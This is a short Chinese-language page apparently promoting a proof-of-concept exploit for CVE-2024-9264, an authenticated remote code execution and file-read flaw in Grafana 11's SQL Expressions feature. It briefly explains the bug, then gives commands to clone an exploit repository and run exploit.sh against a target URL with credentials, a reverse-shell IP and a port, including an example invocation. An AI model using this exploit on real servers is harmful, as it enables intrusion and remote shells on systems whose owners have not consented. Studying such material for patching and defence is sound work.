通过 SQL 表达式在 Grafana (v11.0) 中实现认证 RCE - PoC 漏洞利用
CVE-2024-9264 - Grafana v11.0
认证远程代码执行 (RCE)
PoC
CVE-2024-9264 是 Grafana 11 的实验性“SQL 表达式”功能中引入的一个严重远程代码执行和本地文件包含漏洞。该 API 将用户提供的 SQL 直接传递给 DuckDB CLI,而未进行充分的清理,因此任何拥有 Viewer 或更高级别权限的认证账户都可以注入 shell 命令或读取任意文件,前提是 duckdb 二进制文件位于服务器的 PATH 中。
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh
# 使用方法
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
示例:
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337